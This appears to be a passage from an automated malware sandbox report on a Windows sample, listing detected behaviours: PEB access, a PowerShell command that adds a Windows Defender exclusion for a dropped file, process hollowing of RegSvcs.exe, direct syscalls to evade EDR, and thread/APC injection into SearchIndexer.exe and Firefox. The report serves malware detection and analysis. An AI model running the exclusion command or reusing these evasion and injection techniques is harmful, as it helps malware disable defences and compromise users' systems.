            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]6_2_01502835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]6_2_01502835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov ecx, dword ptr fs:[00000030h]6_2_01502835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]6_2_01502835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]6_2_01502835
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E8C0 mov eax, dword ptr fs:[00000030h]6_2_0150E8C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C8F9 mov eax, dword ptr fs:[00000030h]6_2_0151C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C8F9 mov eax, dword ptr fs:[00000030h]6_2_0151C8F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AA8E4 mov eax, dword ptr fs:[00000030h]6_2_015AA8E4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0887 mov eax, dword ptr fs:[00000030h]6_2_014E0887
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C89D mov eax, dword ptr fs:[00000030h]6_2_0156C89D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158EB50 mov eax, dword ptr fs:[00000030h]6_2_0158EB50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01594B4B mov eax, dword ptr fs:[00000030h]6_2_01594B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01594B4B mov eax, dword ptr fs:[00000030h]6_2_01594B4B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576B40 mov eax, dword ptr fs:[00000030h]6_2_01576B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576B40 mov eax, dword ptr fs:[00000030h]6_2_01576B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AAB40 mov eax, dword ptr fs:[00000030h]6_2_015AAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01588B42 mov eax, dword ptr fs:[00000030h]6_2_01588B42
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DCB7E mov eax, dword ptr fs:[00000030h]6_2_014DCB7E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]6_2_0155EB1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150EB20 mov eax, dword ptr fs:[00000030h]6_2_0150EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150EB20 mov eax, dword ptr fs:[00000030h]6_2_0150EB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A8B28 mov eax, dword ptr fs:[00000030h]6_2_015A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A8B28 mov eax, dword ptr fs:[00000030h]6_2_015A8B28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]6_2_014E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]6_2_014E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]6_2_014E0BCD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158EBD0 mov eax, dword ptr fs:[00000030h]6_2_0158EBD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]6_2_01500BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]6_2_01500BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01500BCB mov eax, dword ptr fs:[00000030h]6_2_01500BCB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156CBF0 mov eax, dword ptr fs:[00000030h]6_2_0156CBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150EBFC mov eax, dword ptr fs:[00000030h]6_2_0150EBFC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]6_2_014E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]6_2_014E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8BF0 mov eax, dword ptr fs:[00000030h]6_2_014E8BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01594BB0 mov eax, dword ptr fs:[00000030h]6_2_01594BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01594BB0 mov eax, dword ptr fs:[00000030h]6_2_01594BB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0BBE mov eax, dword ptr fs:[00000030h]6_2_014F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0BBE mov eax, dword ptr fs:[00000030h]6_2_014F0BBE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0A5B mov eax, dword ptr fs:[00000030h]6_2_014F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0A5B mov eax, dword ptr fs:[00000030h]6_2_014F0A5B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E6A50 mov eax, dword ptr fs:[00000030h]6_2_014E6A50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155CA72 mov eax, dword ptr fs:[00000030h]6_2_0155CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155CA72 mov eax, dword ptr fs:[00000030h]6_2_0155CA72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158EA60 mov eax, dword ptr fs:[00000030h]6_2_0158EA60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]6_2_0151CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]6_2_0151CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151CA6F mov eax, dword ptr fs:[00000030h]6_2_0151CA6F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156CA11 mov eax, dword ptr fs:[00000030h]6_2_0156CA11
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01504A35 mov eax, dword ptr fs:[00000030h]6_2_01504A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01504A35 mov eax, dword ptr fs:[00000030h]6_2_01504A35
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151CA24 mov eax, dword ptr fs:[00000030h]6_2_0151CA24
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150EA2E mov eax, dword ptr fs:[00000030h]6_2_0150EA2E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01514AD0 mov eax, dword ptr fs:[00000030h]6_2_01514AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01514AD0 mov eax, dword ptr fs:[00000030h]6_2_01514AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0AD0 mov eax, dword ptr fs:[00000030h]6_2_014E0AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]6_2_01536ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]6_2_01536ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01536ACC mov eax, dword ptr fs:[00000030h]6_2_01536ACC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151AAEE mov eax, dword ptr fs:[00000030h]6_2_0151AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151AAEE mov eax, dword ptr fs:[00000030h]6_2_0151AAEE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518A90 mov edx, dword ptr fs:[00000030h]6_2_01518A90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EEA80 mov eax, dword ptr fs:[00000030h]6_2_014EEA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015B4A80 mov eax, dword ptr fs:[00000030h]6_2_015B4A80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8AA0 mov eax, dword ptr fs:[00000030h]6_2_014E8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8AA0 mov eax, dword ptr fs:[00000030h]6_2_014E8AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01536AA4 mov eax, dword ptr fs:[00000030h]6_2_01536AA4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]6_2_014E0D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]6_2_014E0D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0D59 mov eax, dword ptr fs:[00000030h]6_2_014E0D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]6_2_014E8D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]6_2_014E8D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]6_2_014E8D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]6_2_014E8D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8D59 mov eax, dword ptr fs:[00000030h]6_2_014E8D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01578D6B mov eax, dword ptr fs:[00000030h]6_2_01578D6B
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtOpenKeyEx: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQueryValueKey: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchIndexer.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: NULL target: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SearchIndexer.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeSection loaded: NULL target: C:\Windows\SysWOW64\SearchIndexer.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\SearchIndexer.exeThread register set: target process: 8112Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\SearchIndexer.exeThread APC queued: target process: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: CF3008Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9B0008Jump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\snTlRrBza.exe"Jump to behavior
